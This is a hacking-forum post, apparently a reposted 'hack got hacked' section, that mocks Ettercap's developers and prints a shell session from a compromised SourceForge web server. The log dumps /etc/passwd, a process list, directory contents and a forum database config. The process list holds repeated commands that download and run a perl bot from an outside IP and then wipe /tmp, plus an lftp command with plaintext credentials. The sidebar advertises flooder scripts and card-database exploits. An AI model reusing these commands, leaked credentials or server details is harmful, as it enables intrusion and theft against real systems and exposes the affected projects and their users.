Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Navigation
:: Portal ::
:: Forum ::
 :: Memberlist ::
:: Profile ::
:: FAQ ::
:: Search ::


AlertPay Easy Money Transfer 100% Free to register
 
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Google Translator
Latest topics
» IRC Flooder Script For Sale
Mon Oct 08, 2012 12:39 am by maxi.y.mateo

» utusan.com.my Being DDOS
Fri Jan 20, 2012 5:33 pm by Penjejak Badai

» PHP IRC Bot
Fri Dec 02, 2011 11:31 am by siperda

» SQL Injection Scanner By XShimeX
Mon Oct 24, 2011 6:22 pm by sucide_bomber

» Website Vulnerable Scanner Tools V1.01 By proqrammer
Mon Oct 24, 2011 6:21 pm by sucide_bomber

» Slowloris or XerXes Leak Version
Tue Sep 13, 2011 7:45 pm by sucide_bomber

» maisarah wuz here
Tue Sep 13, 2011 7:32 pm by sucide_bomber

» Sql Injection Tutorial
Tue Jul 19, 2011 2:56 pm by sucide_bomber

» XerXes Source Codes!!
Wed Jul 13, 2011 8:55 am by wackwall

» SQL Injection dalam bahasa Malaysia
Thu Jun 30, 2011 9:11 pm by sucide_bomber

» LFI Scanner ( Perl )
Mon Jun 27, 2011 8:21 am by wackwall

» Muhasabah diri tingkat kesyukuran, keinsafan umat
Mon Jun 27, 2011 3:56 am by sucide_bomber

» 5013 Webs With SQL Vuln
Mon Jun 27, 2011 3:50 am by sucide_bomber

» Saya mencari part time job online?
Mon Jun 27, 2011 1:19 am by sucide_bomber

» 16 exploits for hacking CC databases
Mon Jun 13, 2011 1:33 pm by sucide_bomber

Link Exchange
Online News


















Churp2x Campaign
Click Pada Iklan DiBawah & Dapatkan Ganjaran Anda
SEKARANG!



















Mangga Ads
NuffNang Ads

Share | 
 

 Part 3 : hack got hacked.. happy reading anyone!!

View previous topic View next topic Go down 
AuthorMessage
wackwall
Admin


Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 2620
Reputation : 2
Join date : 10/12/2010
Age : 35
Location Location : Sarawak

PostSubject: Part 3 : hack got hacked.. happy reading anyone!!   Thu Jan 27, 2011 3:23 pm

=========================
~ ettercap ~ !
=========================


You would think that the authors of Ettercap, one of the most popular
whitehat pentesting tools, would know the basics of security.
Apparently they don't, or they just don't give a shit about what
happens to their users.

So, why is their website so insecure? Ettercap's message board is
hosted at Sourceforge, so they share a server with thousands of other
customers. Every single customer is able to execute commands and
access the other project directories. Pretty stupid, eh? You only need
to find one hole in one hosted site and you can access ALL the project
databases. Of course that isn't ALoR's fault, it's Sourceforge's
fault. Regardless, people who care about security and data integrity
wouldn't use such a shitty provider, would they? To be fair, the
Ettercap project is dead. Most of the admins have been inactive for a
few years now, but that is no excuse for such a security mess.
Especially since the server was compromised some five years ago.

Just look at the process list, horrible. Even the worst perl bots
(scax) get access. If such a poorly written bot can own this box,
everyone can.

Some good advice to all other people/projects who are using
Sourceforge: Move. There are enough good alternatives. Yes, I am
talking to you Vim, get the fuck out of there. And to all Ettercap
users: arp poisoning is *not* hacking. If you want to achieve
something real, learn the fundamentals and not how to use a GUI. Don't
sniff the passwords of your friends and call yourself a pentester


=======================================================================

|$ uname -a
Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux

|$ id
uid=48(apache) gid=48(apache) groups=48(apache),302(amqp)

|$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
sashroot:x:0:500:sashroot:/sashroot:/bin/bash
osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin
puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
vhost:*:310:310:Vhost User:/home/vhost:/bin/bash
rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash
nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false
nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin
dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false
www:*:448:448:WWW User:/var/www:/bin/bash
sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash
sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash
avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin
rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin

|$ ps auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 10352 80 ? Ss Sep28 0:46 init [3]
root 2 0.0 0.0 0 0 ? S< Sep28 1:58 [migration/0]
root 3 0.0 0.0 0 0 ? SN Sep28 0:01 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/0]
root 5 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/1]
root 6 0.0 0.0 0 0 ? SN Sep28 0:48 [ksoftirqd/1]
root 7 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/1]
root 8 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/2]
root 9 0.0 0.0 0 0 ? SN Sep28 0:09 [ksoftirqd/2]
root 10 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/2]
root 11 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/3]
root 12 0.0 0.0 0 0 ? SN Sep28 1:42 [ksoftirqd/3]
root 13 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/3]
root 14 0.0 0.0 0 0 ? S< Sep28 0:14 [migration/4]
root 15 0.0 0.0 0 0 ? SN Sep28 0:02 [ksoftirqd/4]
root 16 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/4]
root 17 0.0 0.0 0 0 ? S< Sep28 0:20 [migration/5]
root 18 0.0 0.0 0 0 ? SN Sep28 0:04 [ksoftirqd/5]
root 19 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/5]
root 20 0.0 0.0 0 0 ? S< Sep28 0:09 [migration/6]
root 21 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/6]
root 22 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/6]
root 23 0.0 0.0 0 0 ? S< Sep28 0:08 [migration/7]
root 24 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/7]
root 25 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/7]
root 26 0.0 0.0 0 0 ? S< Sep28 0:00 [events/0]
root 27 0.0 0.0 0 0 ? S< Sep28 0:00 [events/1]
root 28 0.0 0.0 0 0 ? S< Sep28 0:00 [events/2]
root 29 0.0 0.0 0 0 ? S< Sep28 0:00 [events/3]
root 30 0.0 0.0 0 0 ? S< Sep28 0:00 [events/4]
root 31 0.0 0.0 0 0 ? S< Sep28 0:00 [events/5]
root 32 0.0 0.0 0 0 ? S< Sep28 0:00 [events/6]
root 33 0.0 0.0 0 0 ? S< Sep28 0:00 [events/7]
root 34 0.0 0.0 0 0 ? S< Sep28 0:00 [khelper]
root 105 0.0 0.0 0 0 ? S< Sep28 0:00 [kthread]
root 116 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/0]
root 117 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/1]
root 118 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/2]
root 119 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/3]
root 120 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/4]
root 121 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/5]
root 122 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/6]
root 123 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/7]
root 124 0.0 0.0 0 0 ? S< Sep28 0:00 [kacpid]
root 237 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/0]
root 238 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/1]
root 239 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/2]
root 240 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/3]
root 241 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/4]
root 242 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/5]
root 243 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/6]
root 244 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/7]
root 247 0.0 0.0 0 0 ? S< Sep28 0:00 [khubd]
root 249 0.0 0.0 0 0 ? S< Sep28 0:00 [kseriod]
root 364 0.0 0.0 0 0 ? S Sep28 0:00 [khungtaskd]
root 367 0.0 0.0 0 0 ? S< Sep28 29:37 [kswapd0]
root 368 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/0]
root 369 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/1]
root 370 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/2]
root 371 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/3]
root 372 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/4]
root 373 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/5]
root 374 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/6]
root 375 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/7]
root 539 0.0 0.0 0 0 ? S< Sep28 0:00 [kpsmoused]
root 618 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_0]
root 637 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/0]
root 638 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/1]
root 639 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/2]
root 640 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/3]
root 641 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/4]
root 642 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/5]
root 643 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/6]
root 644 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/7]
root 645 0.0 0.0 0 0 ? S< Sep28 0:00 [ata_aux]
root 664 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_1]
root 665 0.0 0.0 0 0 ? S< Sep28 5:14 [usb-storage]
root 667 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_2]
root 668 0.0 0.0 0 0 ? S< Sep28 1:45 [usb-storage]
root 679 0.0 0.0 0 0 ? S< Sep28 0:00 [kstriped]
root 716 0.0 0.0 0 0 ? S< Sep28 0:00 [ksnapd]
root 755 0.0 0.0 0 0 ? S< Sep28 30:00 [kjournald]
root 780 0.0 0.0 0 0 ? S< Sep28 0:02 [kauditd]
root 813 0.0 0.0 12764 168 ? S
root 1571 0.0 0.0 0 0 ? S< Sep28 0:00 [kedac]
root 2416 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/0]
root 2417 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/1]
root 2418 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/2]
root 2419 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/3]
root 2420 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/4]
root 2421 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/5]
root 2422 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/6]
root 2423 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/7]
root 2424 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpath_handlerd]
root 2448 0.0 0.0 0 0 ? S< Sep28 0:00 [kjournald]
root 2931 0.0 0.0 0 0 ? S< Sep28 0:00 [bond0]
root 3221 0.0 0.0 92864 476 ? S
root 3223 0.0 0.0 81804 292 ? S
root 3253 0.0 0.0 5912 308 ? Ss Sep28 1:09 syslogd -m 0
root 3256 0.0 0.0 3808 196 ? Ss Sep28 0:15 klogd -x
root 3270 0.0 0.0 10764 280 ? Ss Sep28 1:06 irqbalance
named 3307 0.0 0.0 291644 3428 ? Ssl Sep28 79:54 /usr/sbin/named -u named
rpc 3341 0.0 0.0 8056 32 ? Ss Sep28 0:00 portmap
root 3378 0.0 0.0 0 0 ? S< Sep28 44:14 [rpciod/0]
root 3379 0.0 0.0 0 0 ? S< Sep28 0:19 [rpciod/1]
root 3380 0.0 0.0 0 0 ? S< Sep28 0:16 [rpciod/2]
root 3381 0.0 0.0 0 0 ? S< Sep28 0:19 [rpciod/3]
root 3382 0.0 0.0 0 0 ? S< Sep28 1:01 [rpciod/4]
root 3383 0.0 0.0 0 0 ? S< Sep28 0:17 [rpciod/5]
root 3384 0.0 0.0 0 0 ? S< Sep28 0:16 [rpciod/6]
root 3385 0.0 0.0 0 0 ? S< Sep28 0:18 [rpciod/7]
rpcuser 3398 0.0 0.0 10164 212 ? Ss Sep28 0:00 rpc.statd
root 3421 0.0 0.0 55448 4 ? Ss Sep28 0:00 rpc.idmapd
dbus 3444 0.0 0.0 21260 4 ? Ss Sep28 0:00 dbus-daemon --system
root 3498 0.0 0.0 0 0 ? S< Sep28 9:35 [nfsiod]
root 3499 0.0 0.0 0 0 ? S Sep28 0:00 [lockd]
root 3568 0.0 0.0 3804 4 ? Ss Sep28 0:00 /usr/sbin/acpid
nscd 3589 0.0 0.0 252376 828 ? Ssl Sep28 24:19 /usr/sbin/nscd
root 3630 0.0 0.0 67656 332 ? Ss Sep28 0:48 /usr/sbin/sshd
root 3647 0.0 0.0 22072 412 ? Ss Sep28 1:15 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp 3667 0.0 0.0 23820 5452 ? SLs Sep28 0:31 ntpd -u ntp:ntp -p /var/run/ntpd.pid
exim 3686 0.0 0.0 80572 580 ? Ss Sep28 0:35 /usr/sbin/exim -bd -q1h
root 3824 0.0 0.0 72920 488 ? Ss Sep28 0:36 crond
root 3839 0.0 0.0 95052 3052 ? Ss Sep28 0:36 /usr/sbin/munin-node
root 4211 0.0 0.0 69544 4 ? Ssl Oct13 0:00 sfcbd -d
root 4213 0.0 0.0 59300 4 ? S Oct13 0:00 sfcbd -d
root 4214 0.0 0.0 71740 4 ? S Oct13 0:00 sfcbd -d
root 4274 0.0 0.0 159036 3408 ? Sl Oct13 5:06 /usr/sbin/snmpd -LSnd -Lf /dev/null -p /var/run/snmpd.pid -a -c /etc/snmp/snmpd.sfinc-utils.conf
root 4303 0.0 0.0 61380 4 ? S Oct13 0:00 sfcbd -d
root 4417 0.0 0.0 0 0 ? S Nov24 0:12 [pdflush]
root 4565 0.0 0.0 279692 2792 ? Ssl Oct13 8:44 /opt/dell/srvadmin/sbin/dsm_sa_datamgrd
root 4568 0.0 0.0 61360 4 ? S Oct13 0:00 sfcbd -d
root 4571 0.0 0.0 73688 4 ? S Oct13 0:00 sfcbd -d
root 4864 0.0 0.0 174704 528 ? Ssl Oct13 0:36 /opt/dell/srvadmin/sbin/dsm_sa_eventmgrd
root 4925 0.0 0.0 254748 2084 ? Ssl Oct13 15:43 /opt/dell/srvadmin/sbin/dsm_sa_snmpd
avahi 5106 0.0 0.0 21612 532 ? Ss Sep28 0:00 avahi-daemon: running [sfp-web-9.local]
avahi 5107 0.0 0.0 21480 200 ? Ss Sep28 0:00 avahi-daemon: chroot helper
68 5156 0.0 0.0 29540 1216 ? Ss Sep28 0:52 hald
root 5157 0.0 0.0 21700 448 ? S Sep28 0:00 hald-runner
68 5188 0.0 0.0 10656 484 ? S Sep28 0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
68 5200 0.0 0.0 10660 480 ? S Sep28 0:00 hald-addon-keyboard: listening on /dev/input/event0
root 5208 0.0 0.0 10232 432 ? S Sep28 4:39 hald-addon-storage: polling /dev/scd0
root 5213 0.0 0.0 10232 432 ? S Sep28 1:13 hald-addon-storage: polling /dev/hda
root 5215 0.0 0.0 10232 440 ? S Sep28 1:07 hald-addon-storage: polling /dev/sdb
root 5245 0.0 0.0 35904 240 ? S Sep28 0:00 /usr/sbin/osirisd -r /var/lib/osiris
osiris 5246 0.0 0.0 36116 748 ? S Sep28 0:00 /usr/sbin/osirisd -r /var/lib/osiris
root 5249 0.0 0.0 3796 436 tty1 Ss+ Sep28 0:00 /sbin/mingetty tty1
root 5250 0.0 0.0 3796 436 tty2 Ss+ Sep28 0:00 /sbin/mingetty tty2
root 5251 0.0 0.0 3796 436 tty3 Ss+ Sep28 0:00 /sbin/mingetty tty3
root 5252 0.0 0.0 3796 436 tty4 Ss+ Sep28 0:00 /sbin/mingetty tty4
root 5254 0.0 0.0 3796 436 tty5 Ss+ Sep28 0:00 /sbin/mingetty tty5
root 5256 0.0 0.0 3796 436 tty6 Ss+ Sep28 0:00 /sbin/mingetty tty6
apache 5767 0.0 0.0 8704 828 ? S Nov18 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 5769 0.0 0.0 58608 1508 ? S Nov18 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 8772 0.0 0.4 395468 38516 ? S Nov23 0:02 /usr/sbin/httpd
apache 9928 0.0 0.4 393956 39732 ? S Nov24 0:05 /usr/sbin/httpd
root 10444 0.0 0.0 316928 6416 ? Ss Nov16 0:27 /usr/sbin/httpd
root 10445 0.0 0.0 3852 504 ? S Nov16 1:57 /usr/sbin/cronolog --symlink=/var/local/log/error_log /var/local/log/%Y/%m/%d/error.log
root 10447 0.0 0.0 3848 440 ? S Nov16 1:23 /usr/sbin/cronolog --symlink=/var/local/log/vhost_log /var/local/log/%Y/%m/%d/vhost_log
root 10448 0.0 0.0 3848 460 ? S Nov16 5:50 /usr/sbin/cronolog --symlink=/var/local/log/access_log /var/local/log/%Y/%m/%d/access_log
root 10449 0.0 0.0 3856 440 ? S Nov16 0:03 /usr/sbin/cronolog --symlink=/var/local/log/developerweb_log /var/local/log/%Y/%m/%d/developerweb_log
root 10450 0.0 0.2 125312 18580 ? Sl Nov16 10:28 /usr/bin/perl -w /var/local/mastertree/host/sfp-web/scripts/vhost_rewriter
apache 10865 0.0 0.3 390016 25028 ? S Nov24 0:01 /usr/sbin/httpd
apache 11814 0.0 0.0 8704 1016 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 11816 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 12188 0.0 0.0 8704 980 ? S Nov24 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
apache 12189 0.0 0.0 58616 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";
root 12523 0.0 0.0 56648 392 ? Ss Nov04 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
nginx 12524 0.2 0.0 57388 1500 ? S Nov04 68:37 nginx: worker process
nginx 12525 0.1 0.0 57764 1840 ? S Nov04 59:01 nginx: worker process
nginx 12526 0.2 0.0 57456 1520 ? S Nov04 64:31 nginx: worker process
nginx 12527 0.2 0.0 58160 2404 ? S Nov04 63:14 nginx: worker process
nginx 12528 0.1 0.0 57788 1780 ? S Nov04 47:43 nginx: worker process
nginx 12529 0.1 0.0 57720 1792 ? S Nov04 48:26 nginx: worker process
nginx 12530 0.2 0.0 57584 1620 ? S Nov04 61:50 nginx: worker process
nginx 12531 0.2 0.0 57856 1884 ? S Nov04 64:09 nginx: worker process
apache 13296 0.7 0.5 411004 46200 ? S 12:18 0:04 /usr/sbin/httpd
apache 13709 0.0 0.5 403000 42372 ? S Nov24 0:06 /usr/sbin/httpd
rtstats 15645 1.6 0.1 179260 10884 ? S Nov16 221:11 /usr/bin/python /var/local/stats/rtstats/datasources/prweb.py --daemonize --tail --pidfile /var/run/rtstats/prweb.pid --infolog /var/log/rtstats/datasource-prweb.log --configfile /var/local/config/rtstats/datasources/prweb.cfg --configfile /var/local/stats/rtstats.cfg
apache 16268 0.0 0.0 60804 1508 ? S Nov19 0:00 lftp -u GFS,87dbcvwx15s4f56ds54f perfo-lehavre.no-ip.org -p 146 -e lcd "/home/groups/f/fl/florianrobinet/htdocs/GFS/Archives"; mirror -s -R --Remove-source-files; exit
apache 17814 0.0 0.0 8704 1040 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 17818 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 18478 0.0 0.3 391904 28156 ? S 03:26 0:13 /usr/sbin/httpd
apache 18960 2.8 0.5 398652 45604 ? S 12:25 0:05 /usr/sbin/httpd
apache 19043 2.5 0.4 398116 33464 ? S 12:25 0:05 /usr/sbin/httpd
apache 19055 4.9 0.5 405644 41216 ? S 12:25 0:09 /usr/sbin/httpd
apache 19056 2.9 0.4 402072 37836 ? S 12:25 0:05 /usr/sbin/httpd
apache 19077 2.5 0.4 399132 35544 ? S 12:25 0:04 /usr/sbin/httpd
apache 19093 3.0 0.4 397244 34216 ? S 12:25 0:05 /usr/sbin/httpd
apache 19094 3.1 0.5 398832 43744 ? S 12:25 0:05 /usr/sbin/httpd
apache 19741 0.0 0.0 8704 1028 ? S 03:29 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 19745 0.0 0.0 58608 2616 ? S 03:29 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 19789 2.0 0.4 394212 36988 ? S 12:27 0:02 /usr/sbin/httpd
apache 19903 2.4 0.4 396360 37188 ? S 12:27 0:02 /usr/sbin/httpd
apache 19945 2.7 0.3 395120 30760 ? S 12:27 0:02 /usr/sbin/httpd
apache 20138 3.1 0.3 395072 30492 ? S 12:27 0:02 /usr/sbin/httpd
apache 20203 2.0 0.4 394404 35928 ? S 12:27 0:01 /usr/sbin/httpd
apache 20274 3.0 0.3 397052 30000 ? S 12:27 0:02 /usr/sbin/httpd
apache 20434 0.0 0.3 401880 29916 ? S Nov24 0:28 /usr/sbin/httpd
apache 20439 2.5 0.3 393252 30576 ? S 12:28 0:01 /usr/sbin/httpd
apache 22124 0.0 0.4 401232 34788 ? S Nov24 0:05 /usr/sbin/httpd
apache 23720 0.0 0.0 8704 1008 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 23722 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 24614 0.0 0.0 8704 1020 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 24616 0.0 0.0 58608 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 24714 0.0 0.1 377988 12680 ? S Nov24 0:00 /usr/sbin/httpd
apache 24719 0.0 0.0 8704 980 ? S Nov24 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
apache 24720 0.0 0.0 58616 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";
apache 25971 0.0 0.0 8704 828 ? S Nov21 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 25974 0.0 0.0 58608 1512 ? S Nov21 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
root 27631 0.0 0.0 0 0 ? S Nov23 0:00 [pdflush]
apache 31023 0.0 0.1 399148 8908 ? S Nov23 0:04 /usr/sbin/httpd
apache 31873 0.0 0.3 388288 25512 ? S 01:48 0:01 /usr/sbin/httpd
apache 32062 0.0 0.0 8704 1064 ? S 01:48 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 32067 0.0 0.0 58608 2620 ? S 01:48 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 32288 0.0 0.0 8704 820 ? S Nov23 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
apache 32289 0.0 0.0 58608 1508 ? S Nov23 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";

|$ w
12:28:48 up 30 days, 40 min, 1 user, load average: 0.65, 0.64, 0.66
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 sec-sog-2.v99.ch 04:17 8:03m 0.11s 0.11s -bash

|$ ls -lah /home/groups/e/et/ettercap/htdocs/
total 2.7M
drwxrwsr-x 8 dummy 18435 2.0K Oct 18 2009 .
drwxrws--x 5 dummy 18435 1.0K Sep 17 2008 ..
-rw-r--r-- 1 42100 18435 2.2K Dec 21 2004 authors.php
drwxr-xr-x 2 42100 18435 2.0K Aug 9 2008 devel
-rw-r--r-- 1 42100 18435 1.6K Apr 15 2004 download.php
-rw-r--r-- 1 42100 18435 2.7K Apr 24 2004 fingerprint.php
drwx--x--x 10 42100 18435 2.0K Oct 18 2009 forum
-rw-r--r-- 1 42100 18435 2.2K Apr 15 2004 history.php
drwxr-xr-x 3 42100 18435 1.0K Aug 9 2008 images
drwxr-xr-x 2 42100 18435 1.0K Aug 9 2008 includes
-rw-r--r-- 1 42100 18435 4.6K Sep 23 2004 index.php
-rw-r--r-- 1 42100 18435 768 Apr 15 2004 latest.php
-rw-r--rw- 1 42100 18435 5 Aug 15 2005 latest.stat
-rw-r--r-- 1 42100 18435 886 Apr 15 2004 news.php
-rw-r--r-- 1 42100 18435 5.3K Nov 13 2003 news.txt
-rw-r--r-- 1 42100 18435 2.3M Oct 18 2009 phpBB-3.0.5.zip
drwxr-xr-x 13 42100 18435 2.0K Oct 18 2009 phpBB3
-rw-r--r-- 1 42100 18435 743 Apr 15 2004 plugins.php
-rw-r--r-- 1 42100 18435 914 May 6 2003 plugins.txt
drwxr-xr-x 2 42100 18435 2.0K Aug 9 2008 release
-rw-r--r-- 1 42100 18435 3.7K Apr 15 2004 screenshots.php
-rw-r--r-- 1 42100 18435 1019 Apr 15 2004 search.php
-rw-r--r-- 1 42100 18435 1.8K Apr 15 2004 stuff.php
-rw-r--r-- 1 42100 18435 1.5K Jan 25 2001 style.css
-rw-r--rw- 1 42100 18435 3.0K Aug 15 2005 submitted.fingers.txt
-rw-r--r-- 1 42100 18435 12K Jun 24 2005 updateNG.data
-rw-rw-rw- 1 42100 18435 230K Aug 15 2005 updateNG.log
-rw-r--r-- 1 42100 18435 2.0K Nov 9 2005 updateNG.php
-rwxr-xr-x 1 42100 18435 201 Jul 13 2003 updateNG.sh

|$ cat /home/groups/e/et/ettercap/htdocs/updateNG.sh
#!/bin/sh

wget http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/ettercap/ettercap_ng/share/ -O updateNG.data
chmod 644 updateNG.data
scp updateNG.data alor@ettercap.sf.net:ettercap
rm -f updateNG.data

|$ cat /home/groups/e/et/ettercap/htdocs/forum/config.php
||
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//

|$dbms = "mysql";

|$dbhost = "mysql4-e";
|$dbname = "e17435_etterforum";
|$dbuser = "e17435admin";
